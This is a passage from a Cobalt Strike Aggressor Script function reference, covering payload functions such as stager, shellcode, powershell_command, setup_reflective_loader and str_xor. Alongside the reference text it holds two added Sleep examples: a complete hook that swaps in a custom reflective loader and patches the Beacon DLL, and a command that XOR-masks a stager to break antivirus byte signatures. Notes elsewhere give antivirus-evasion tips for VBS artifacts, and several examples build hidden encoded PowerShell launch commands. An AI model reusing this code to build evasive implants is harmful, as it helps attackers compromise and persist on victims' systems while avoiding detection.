      warn("Current Sections.AddressOfName.1 value: " . @val[0]);
   }

   if (size(@loc) != 1) {
      warn("Unexpected size of Sections.AddressOfName.1 location array: " . size(@loc));
   } else {
      warn("Current Sections.AddressOfName.1 location: " . @loc[0]);
   }

   # -------------------------------------
   # Set parameters (parse number as base 10)
   # -------------------------------------
   $location = parseNumber(@loc[0], 10);

   # -------------------------------------
   # pe_stomp (stomp a string at a location)
   # -------------------------------------
   # warn("pe_stomp(dll, " . $location . ")");
   $temp_dll = pe_stomp($temp_dll, $location);

   # -------------------------------------
   # Did it work?
   # -------------------------------------
   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

pe_update_checksum

Update the checksum in the Beacon DLL Content.

Arguments

$1 - Beacon DLL content

Returns

Updated DLL Content

Note

This should be the last transformation performed.

Example

# -------------------------------------
# update checksum
# -------------------------------------
$temp_dll = pe_update_checksum($temp_dll);

pedump

Parse an executable Beacon into a map of the PE Header information. The parsed information can be used for research or programmatically to make changes to the Beacon.

Arguments

$1 - Beacon DLL content

Returns

A map of the parsed information. The map data is very similar to the "./peclone dump [file]" command output.

Example

# ===========================================================================
# 'case insensitive sort' from sleep manual...
# ===========================================================================
sub caseInsensitiveCompare
{
   $a = lc($1);
   $b = lc($2);
   return $a cmp $b;
}

# ===========================================================================
# Dump PE Information
# $1 = Beacon DLL content
# ===========================================================================
sub dump_my_pe {
   local('$out $key $val %pemap @sorted_keys');

   %pemap = pedump($1);

   # ---------------------------------------------------
   # Example listing all items from hash/map...
   # ---------------------------------------------------
   @sorted_keys = sort(&caseInsensitiveCompare, keys(%pemap));
   foreach $key (@sorted_keys)
   {
      $out = "$[50]key";
      # collect every value stored under this key, then print the line once
      foreach $val (values(%pemap, @($key)))
      {
         $out .= " $val";
      }
      println($out);
   }

   # ---------------------------------------------------
   # Example of grabbing specific items from hash/map...
   # ---------------------------------------------------
   local('@loc_cs @val_cs');
   @loc_cs = values(%pemap, @("CheckSum.<location>"));
   @val_cs = values(%pemap, @("CheckSum.<value>"));

   println("");
   println("My DLL CheckSum Location: " . @loc_cs);
   println("My DLL CheckSum Value: " . @val_cs);
   println("");
}
See also

./peclone dump [file]

pgraph

Generate the pivot graph GUI component.

Returns

The pivot graph GUI object (a javax.swing.JComponent)

Example

addVisualization("Pivot Graph", pgraph());
See also

&showVisualization

pivots

Returns a list of SOCKS pivots from Cobalt Strike's data model.

Returns

An array of dictionary objects with information about each pivot.

Example

printAll(pivots());

popup_clear

Remove all popup menu definitions registered for the specified popup hook. This is a way to override Cobalt Strike's default popup menu definitions before registering your own.

Arguments

$1 - the popup hook to clear registered menus for

Example

popup_clear("help");

popup help {
   item "My stuff!" {
      show_message("This is my menu!");
   }
}

powershell

DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &artifact_stager and &powershell_command instead.

Returns a PowerShell one-liner to bootstrap the specified listener.

Arguments

$1 - the listener name

$2 - [true/false]: is this listener targeting local host?

$3 - x86|x64 - the architecture of the generated stager.

Notes

Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.

Returns

A PowerShell one-liner to run the specified listener.

Example

println(powershell("my listener", false, "x86"));

powershell_command

Returns a one-liner to run a PowerShell expression (e.g., powershell.exe -nop -w hidden -encodedcommand MgAgACsAIAAyAA==)

Arguments

$1 - the PowerShell expression to wrap into a one-liner.

$2 - will the PowerShell command run on a remote target?

Returns

Returns a powershell.exe one-liner to run the specified expression.

Example

$cmd = powershell_command("2 + 2", false);
println($cmd);

powershell_compress

Compresses a PowerShell script and wraps it in a script to decompress and execute it.

Arguments

$1 - the PowerShell script to compress.

Example

$script = powershell_compress("2 + 2");

powershell_encode_oneliner

DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &powershell_command instead.

Returns a one-liner to run a PowerShell expression (e.g., powershell.exe -nop -w hidden -encodedcommand MgAgACsAIAAyAA==)

Arguments

$1 - the PowerShell expression to wrap into a one-liner.

Returns

Returns a powershell.exe one-liner to run the specified expression.

Example

$cmd = powershell_encode_oneliner("2 + 2");
println($cmd);

powershell_encode_stager

DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &artifact_general and &powershell_command instead.

Returns a base64 encoded PowerShell script to run the specified shellcode

Arguments

$1 - shellcode to wrap

Returns

Returns a base64 encoded PowerShell suitable for use with powershell.exe's -enc option.

Example

$shellcode  = shellcode("my listener", false, "x86");
$readytouse = powershell_encode_stager($shellcode);
println("powershell.exe -ep bypass -enc $readytouse");

pref_get

Grabs a string value from Cobalt Strike's preferences.

Arguments

$1 - the preference name

$2 - the default value [if there is no value for this preference]

Returns

A string with the preference value.

Example

$foo = pref_get("foo.string", "bar");

pref_get_list

Grabs a list value from Cobalt Strike's preferences.

Arguments

$1 - the preference name

Returns

An array with the preference values

Example

@foo = pref_get_list("foo.list");

pref_set

Set a value in Cobalt Strike's preferences

Arguments

$1 - the preference name

$2 - the preference value

Example

pref_set("foo.string", "baz!");

pref_set_list

Stores a list value into Cobalt Strike's preferences.

Arguments

$1 - the preference name

$2 - an array of values for this preference

Example

pref_set_list("foo.list", @("a", "b", "c"));

previousTab

Activate the tab that is to the left of the current tab.

Example

bind Ctrl+Left {
   previousTab();
}

process_browser

Opens the Process Browser. This function does not have any parameters.

privmsg

Post a private message to a user in the event log

Arguments

$1 - who to send the message to   

$2 - the message

Example

privmsg("raffi", "what's up man?");

prompt_confirm

Show a dialog with Yes/No buttons. If the user presses yes, call the specified function.

Arguments

$1 - text in the dialog

$2 - title of the dialog

$3 - a callback function. Called when the user presses yes.

Example

prompt_confirm("Do you feel lucky?", "Do you?", {
   show_message("Ok, I got nothing");
});

prompt_directory_open

Show a directory open dialog.

Arguments

$1 - title of the dialog

$2 - default value

$3 - true/false: allow user to select multiple folders?

$4 - a callback function. Called when the user chooses a folder. The argument to the callback is the selected folder. If multiple folders are selected, they will still be specified as the first argument, separated by commas.

Example

prompt_directory_open("Choose a folder", $null, false, {
   show_message("You chose: $1");
});

prompt_file_open

Show a file open dialog.

Arguments

$1 - title of the dialog

$2 - default value

$3 - true/false: allow user to select multiple files?

$4 - a callback function. Called when the user chooses a file to open. The argument to the callback is the selected file. If multiple files are selected, they will still be specified as the first argument, separated by commas.

Example

prompt_file_open("Choose a file", $null, false, {
   show_message("You chose: $1");
});

prompt_file_save

Show a file save dialog.

Arguments

$1 - default value

$2 - a callback function. Called when the user chooses a filename. The argument to the callback is the desired file.

Example

prompt_file_save($null, {
   local('$handle');
   $handle = openf("> $+ $1");
   println($handle, "I am content");
   closef($handle);
});

prompt_text

Show a dialog that asks the user for text.

Arguments

$1 - text in the dialog

$2 - default value in the text field.

$3 - a callback function. Called when the user presses OK. The first argument to this callback is the text the user provided.

Example

prompt_text("What is your name?", "Cyber Bob", {
   show_message("Hi $1 $+ , nice to meet you!");
});

range

Generate an array of numbers based on a string description of ranges.

Arguments

$1 - a string with a description of ranges

Range    Result
103      The number 103
3-8      The numbers 3, 4, 5, 6, and 7.
2,4-6    The numbers 2, 4, and 5.

Returns

An array of numbers within the specified ranges.

Example

printAll(range("2,4-6"));

redactobject

Removes a post-exploitation object (e.g., screenshot, keystroke buffer) from the user interface.

Arguments

$1 - the ID of the post-exploitation object.

removeTab

Close the active tab

Example

bind Ctrl+D {
   removeTab();
}

resetData

Reset Cobalt Strike's data model.

say

Post a public chat message to the event log.

Arguments

$1 - the message

Example

say("Hello World!");

sbrowser

Generate the session browser GUI component. Shows Beacon AND SSH sessions.

Returns

The session browser GUI object (a javax.swing.JComponent)

Example

addVisualization("Session Browser", sbrowser());
See also

&showVisualization

screenshots

Returns a list of screenshots from Cobalt Strike's data model.

Returns

An array of dictionary objects with information about each screenshot.

Example

printAll(screenshots());

script_resource

Returns the full path to a resource that is stored relative to this script file.

Arguments

$1 - the file to get a path for

Returns

The full path to the specified file.

Example

println(script_resource("dummy.txt"));

separator

Insert a separator into the current menu tree.

Example

popup foo {
   item "Stuff" { ... }
   separator();
   item "Other Stuff" { ... }
}

services

Returns a list of services in Cobalt Strike's data model.

Returns

An array of dictionary objects with information about each service.

Example

printAll(services());

setup_reflective_loader

Insert the reflective loader executable code into a beacon payload.

Arguments

$1 - Original beacon executable payload.

$2 - User defined Reflective Loader executable data.

Returns

The beacon executable payload updated with the user defined reflective loader. $null if there is an error.

Notes

The user defined Reflective Loader must be less than 5k.

Example

See BEACON_RDLL_GENERATE hook

# ---------------------------------------------------------------------
# Replace the beacons default loader with '$loader'.
# ---------------------------------------------------------------------
$temp_dll = setup_reflective_loader($2, $loader);

setup_strings

Apply the strings defined in the Malleable C2 profile to the beacon payload.

Arguments

$1 - beacon payload to modify

Returns

The updated beacon payload with the defined strings applied to the payload.

Example

See BEACON_RDLL_GENERATE hook

# Apply strings to the beacon payload.
$temp_dll = setup_strings($temp_dll);

setup_transformations

Apply the transformations rules defined in the Malleable C2 profile to the beacon payload.

Arguments

$1 - Beacon payload to modify

$2 - Beacon architecture (x86/x64)

Returns

The updated beacon payload with the transformations applied to the payload.

Example

See BEACON_RDLL_GENERATE hook

# Apply the transformations to the beacon payload.
$temp_dll = setup_transformations($temp_dll, $arch);
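setup_reflective_loader, setup_strings, setup_transformations and pe_update_checksum are the steps of one procedure inside the BEACON_RDLL_GENERATE hook, so here is a complete hook that chains them. This is an added example, not code from the Cobalt Strike documentation or from any of the Cobalt Strike kits. It assumes the hook receives the original Beacon DLL as $2 and the architecture as $3 (check the hooks reference for your release), that a prebuilt loader sits next to the script as loader.x86.bin / loader.x64.bin, that "less than 5k" means 5120 bytes, and that returning $null from the hook makes Cobalt Strike fall back to its built-in loader.

```sleep
# Added example, not from the Cobalt Strike docs or kits. Assumptions:
# $2 is the original Beacon DLL, $3 is the architecture, the loader file
# is loader.<arch>.bin beside this script, "5k" means 5120 bytes, and a
# $null return tells Cobalt Strike to use its default loader.
set BEACON_RDLL_GENERATE {
   local('$arch $handle $loader $path $temp_dll');

   $temp_dll = $2;
   $arch     = $3;

   # Locate the prebuilt loader for this architecture.
   $path = script_resource("loader. $+ $arch $+ .bin");
   if (!-exists $path) {
      warn("no loader at $path $+ ; using the default loader");
      return $null;
   }

   $handle = openf($path);
   $loader = readb($handle, -1);
   closef($handle);

   # The reference says the loader must be under 5k. Refuse anything
   # larger up front instead of letting the insertion fail later.
   if (strlen($loader) == 0 || strlen($loader) > 5120) {
      warn("loader for $arch is " . strlen($loader) . " bytes; using the default loader");
      return $null;
   }

   # 1. Swap the default loader for ours. $null means the insertion failed.
   $temp_dll = setup_reflective_loader($temp_dll, $loader);
   if ($temp_dll is $null) {
      warn("setup_reflective_loader failed for $arch $+ ; using the default loader");
      return $null;
   }

   # 2. Apply the 'strings' settings from the Malleable C2 profile.
   $temp_dll = setup_strings($temp_dll);

   # 3. Apply the 'transform' rules from the profile for this architecture.
   $temp_dll = setup_transformations($temp_dll, $arch);

   # 4. Fix up the PE checksum last, after every other edit to the DLL.
   $temp_dll = pe_update_checksum($temp_dll);

   return $temp_dll;
}
```

The order matters: the checksum covers the whole image, so any edit after pe_update_checksum leaves a stale value in the header, which is exactly the kind of inconsistency a static scanner can key on.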

shellcode

DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &stager instead.

Returns raw shellcode for a specific Cobalt Strike listener

Arguments

$1 - the listener name

$2 - true/false: is this shellcode destined for a remote target?

$3 - x86|x64 - the architecture of the stager output.

Note

Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.

Returns

A scalar containing shellcode for the specified listener.

Example

$data = shellcode("my listener", false, "x86");

$handle = openf(">out.bin");
writeb($handle, $data);
closef($handle);

showVisualization

Switch Cobalt Strike visualization to a registered visualization.

Arguments

$1 - the name of the visualization

Example

bind Ctrl+H {
   showVisualization("Hello World");
}
See also

&addVisualization

show_error

Shows an error message to the user in a dialog box. Use this function to relay error information.

Arguments

$1 - the message text

Example

show_error("You did something bad.");

show_message

Shows a message to the user in a dialog box. Use this function to relay information.

Arguments

$1 - the message text

Example

show_message("You've won a free ringtone");

site_host

Host content on Cobalt Strike's web server

Arguments

$1 - the host for this site (&localip is a good default)

$2 - the port (e.g., 80)

$3 - the URI (e.g., /foo)

$4 - the content to host (as a string)

$5 - the mime-type (e.g., "text/plain")

$6 - a description of the content. Shown in Site Management -> Manage.

$7 - use SSL or not (true or false)

Returns

The URL to this hosted site

Example

site_host(localip(), 80, "/", "Hello World!", "text/plain", "Hello World Page", false);

site_kill

Remove a site from Cobalt Strike's web server

Arguments

$1 - the port

$2 - the URI

Example

# removes the content bound to / on port 80
site_kill(80, "/");

sites

Returns a list of sites tied to Cobalt Strike's web server.

Returns

An array of dictionary objects with information about each registered site.

Example

printAll(sites());

ssh_command_describe

Describe an SSH command.

Arguments

$1 - the command

Returns

A string description of the SSH command.

Example

println(ssh_command_describe("sudo"));

ssh_command_detail

Get the help information for an SSH command.

Arguments

$1 - the command

Returns

A string with helpful information about an SSH command.

Example

println(ssh_command_detail("sudo"));

ssh_command_register

Register help information for an SSH console command.

Arguments

$1 - the command

$2 - the short description of the command

$3 - the long-form help for the command.

Example

# $0 is the full command line typed by the user; $1 is the session ID
ssh_alias echo {
   blog($1, "You typed: " . substr($0, 5));
}

ssh_command_register(
   "echo", 
   "echo posts to the current session's log", 
   "Synopsis: echo [arguments]\n\nLog arguments to the SSH console");

ssh_commands

Get a list of SSH commands.

Returns

An array of SSH commands.

Example

printAll(ssh_commands());

stager

Returns the stager for a specific Cobalt Strike listener

Arguments

$1 - the listener name

$2 - x86|x64 - the architecture of the stager output.

Note

Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.

Returns

A scalar containing shellcode for the specified listener.

Example

$data = stager("my listener", "x86");

$handle = openf(">out.bin");
writeb($handle, $data);
closef($handle);

stager_bind_pipe

Returns a bind_pipe stager for a specific Cobalt Strike listener. This stager is suitable for use in lateral movement actions that benefit from a small named pipe stager. Stage with &beacon_stage_pipe.

Arguments

$1 - the listener name

Returns

A scalar containing x86 bind_pipe shellcode.

Example

# step 1. generate our stager
$stager = stager_bind_pipe("my listener");

# step 2. do something to run our stager

# step 3. stage a payload via this stager
beacon_stage_pipe($bid, $target, "my listener", "x86");

# step 4. assume control of the payload (if needed)
beacon_link($bid, $target, "my listener");
See also

&artifact_general

stager_bind_tcp

Returns a bind_tcp stager for a specific Cobalt Strike listener. This stager is suitable for use in localhost-only actions that require a small stager. Stage with &beacon_stage_tcp.

Arguments

$1 - the listener name

$2 - x86|x64 - the architecture of the stager output.

$3 - the port to bind to

Returns

A scalar containing bind_tcp shellcode

Example

# step 1. generate our stager
$stager = stager_bind_tcp("my listener", "x86", 1234);

# step 2. do something to run our stager

# step 3. stage a payload via this stager
beacon_stage_tcp($bid, $target, 1234, "my listener", "x86");

# step 4. assume control of the payload (if needed)
beacon_link($bid, $target, "my listener");
See also

&artifact_general

str_chunk

Chunk a string into multiple parts

Arguments

$1 - the string to chunk

$2 - the maximum size of each chunk

Returns

The original string split into multiple chunks

Example

# hint... :)  (fragment from a resource kit generator hook: $data holds
# the PowerShell template text and $2 is the raw payload to embed)
else if ($1 eq "template.x86.ps1") {
   local('$enc');
   # base64 the payload and split it into 61-character pieces so the
   # template gets a run of short '...' + '...' literals instead of one
   # very long line
   $enc = str_chunk(base64_encode($2), 61);
   return strrep($data, '%%DATA%%', join("' + '", $enc));
}

str_decode

Convert a string of bytes to text with the specified encoding.

Arguments

$1 - the string to decode

$2 - the encoding to use.

Returns

The decoded text.

Example

# convert back to a string we can use (from UTF16-LE)
$text = str_decode($string, "UTF16-LE");

str_encode

Convert text to byte string with the specified character encoding.

Arguments

$1 - the string to encode

$2 - the encoding to use

Returns

The resulting string.

Example

# convert to UTF16-LE
$encoded = str_encode("this is some text", "UTF16-LE");

str_xor

Walk a string and XOR it with the provided key.

Arguments

$1 - the string to mask

$2 - the key to use (string)

Returns

The original string masked with the specified key.

Example

$mask  = str_xor("This is a string", "key");
$plain = str_xor($mask, "key");
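str_xor, transform and str_chunk are normally used together when a stager is embedded in a text artifact: mask the bytes so the stager is not sitting in the artifact in the clear, render the masked bytes as text, and wrap that text so the template's lines stay short. The following is an added example, not from the page or from the Cobalt Strike kits; the listener name, key and 64-column width are arbitrary choices, and the artifact that would consume the output (and reverse the masking) is not shown.

```sleep
# Added example, not from the Cobalt Strike docs or kits. The listener
# name, key and line width are assumptions.
command maskstager {
   local('$key $stager $masked $line');

   $key    = "k3y";
   $stager = stager("my listener", "x86");

   # walk the stager bytes and XOR each one with the repeating key
   $masked = str_xor($stager, $key);

   # str_xor is its own inverse with the same key; prove it before
   # emitting anything, so a bad key never ships a broken artifact
   if (str_xor($masked, $key) ne $stager) {
      println("unmask check failed; not emitting artifact");
      return;
   }

   # hex-encode the masked bytes and wrap them at 64 characters per line
   foreach $line (str_chunk(transform($masked, "hex"), 64)) {
      println($line);
   }
}
```

Masking only hides the stager bytes from a static look at the artifact; the key sits next to the data in whatever template consumes these lines, so treat this as a way to break byte signatures, not as protection for the payload.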

sync_download

Sync a downloaded file (View -> Downloads) to a local path.

Arguments

$1 - the remote path to the file to sync. See &downloads

$2 - where to save the file locally

$3 - [optional] a callback function to execute when download is synced. The first argument to this function is the local path of the downloaded file.

Example

# sync all downloads
command ga {
   local('$download $lpath $name $count');
   foreach $count => $download (downloads()) {
      ($lpath, $name) = values($download, @("lpath", "name"));
   
      sync_download($lpath, script_resource("file $+ .$count"), lambda({ 
         println("Downloaded $1 [ $+ $name $+ ]"); 
      }, \$name));
   }
}

targets

Returns a list of host information in Cobalt Strike's data model.

Returns

An array of dictionary objects with information about each host.

Example

printAll(targets());

tbrowser

Generate the target browser GUI component.

Returns

The target browser GUI object (a javax.swing.JComponent)

Example

addVisualization("Target Browser", tbrowser());
See also

&showVisualization

tokenToEmail

Convert a phishing token to an email address.

Arguments

$1 - the phishing token

Returns

The email address or "unknown" if the token is not associated with an email.

Example

set PROFILER_HIT {
   local('$out $app $ver $email');
   $email = tokenToEmail($5);         
   $out = "\c9[+]\o $1 $+ / $+ $2 [ $+ $email $+ ] Applications";
   foreach $app => $ver ($4) {
      $out .= "\n\t $+ $[25]app $ver";
   }
   return "$out $+ \n\n";
}

transform

Transform shellcode into another format.

Arguments

$1 - the shellcode to transform

$2 - the transform to apply

Type                Description
array               comma separated byte values
hex                 Hex-encode the value
powershell-base64   PowerShell.exe-friendly base64 encoder
vba                 a VBA array() with newlines added in
vbs                 a VBS expression that results in a string
veil                Veil-ready string (\x##\x##)

Returns

The shellcode after the specified transform is applied

Example

println(transform("This is a test!", "veil"));

transform_vbs

Transform shellcode into a VBS expression that results in a string

Arguments

$1 - the shellcode to transform

$2 - the maximum length of a plaintext run

Notes

  • Previously, Cobalt Strike would embed its stagers into VBS files as several Chr() calls concatenated into a string.
  • Cobalt Strike 3.9 introduced features that required larger stagers. These larger stagers were too big to embed into a VBS file with the above method.
  • To get past this VBS limitation, Cobalt Strike opted to use Chr() calls for non-ASCII data and runs of double-quoted strings for printable characters.
  • This change, an engineering necessity, unintentionally defeated static anti-virus signatures for Cobalt Strike's default VBS artifacts at that time.
  • If you're looking for an easy evasion benefit with VBS artifacts, consider adjusting the plaintext run length in your Resource Kit.

Returns

The shellcode after this transform is applied

Example

println(transform_vbs("This is a test!", "3"));

tstamp

Format a time into a date/time value. This value does not include seconds.

Arguments

$1 - the time [milliseconds since the UNIX epoch]

Example

println("The time is now: " . tstamp(ticks()));
See also

&dstamp

unbind

Remove a keyboard shortcut binding.

Arguments

$1 - the keyboard shortcut

Example

# restore default behavior of Ctrl+Left and Ctrl+Right
unbind("Ctrl+Left");
unbind("Ctrl+Right");
See also

&bind

url_open

Open a URL in the default browser.

Arguments

$1 - the URL to open

Example

command go {
   url_open("https://www.cobaltstrike.com/");
}

users

Returns a list of users connected to this team server.

Returns

An array of users.

Example

foreach $user (users()) {
   println($user);
}

vpn_interface_info

Get information about a VPN interface.

Arguments

$1 - the interface name

$2 - [Optional] the key to extract a value for

Returns

%info = vpn_interface_info("interface");

Returns a dictionary with the metadata for this interface.

$value = vpn_interface_info("interface", "key");

Returns the value for the specified key from this interface's metadata

Example

# create a script console alias to interface info
command interface {
   println("Interface $1");
   foreach $key => $value (vpn_interface_info($1)) {
      println("$[15]key $value");
   }
}

vpn_interfaces

Return a list of VPN interface names

Returns

An array of interface names.

Example

printAll(vpn_interfaces());

vpn_tap_create

Create a Covert VPN interface on the team server system.

Arguments

$1 - the interface name (e.g., phear0)

$2 - the MAC address ($null will make a random MAC address)

$3 - reserved; use $null for now.

$4 - the port to bind the VPN's channel to

$5 - the type of channel [bind, http, icmp, reverse, udp]

Example

vpn_tap_create("phear0", $null, $null, 7324, "udp");

vpn_tap_delete

Destroy a Covert VPN interface

Arguments

$1 - the interface name (e.g., phear0)

Example

vpn_tap_delete("phear0");